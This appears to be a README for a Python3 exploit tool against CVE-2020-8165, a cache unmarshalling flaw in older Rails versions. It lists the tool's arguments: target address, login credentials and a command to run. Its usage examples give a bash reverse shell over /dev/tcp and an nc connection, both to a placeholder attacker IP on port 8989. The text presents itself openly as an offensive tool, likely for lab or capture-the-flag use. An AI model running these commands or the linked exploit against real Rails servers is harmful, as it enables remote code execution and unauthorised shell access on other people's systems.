This is code to exploit CVE-2020-8165 using Python3. This exploit works with rails < 5.2.4.3, rails < 6.0.3.1. The exploit allows an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore. This exploit code uses ArgParse to allow the user to very simply exploit this vulnerability.

There are five arguments for this exploit:

• rHost - The remote, target, hosts IP address
• rPort - The remote, target, hosts port num that Rails in running on
• email - The email that is used to login to the service
• password - The password to the account to login to the service
• cmd - The command to run, in quotes to account for spaces

Examples:

• python3 exploit.py 10.10.10.X 8080 user@domain.com password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
• python3 exploit.py 10.10.10.X 8080 user@domain.com password "nc 10.10.X.X 8989"

Original CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Pastebin exploit code that I touched up and added arg parse: https://pastebin.com/jpHpdBTk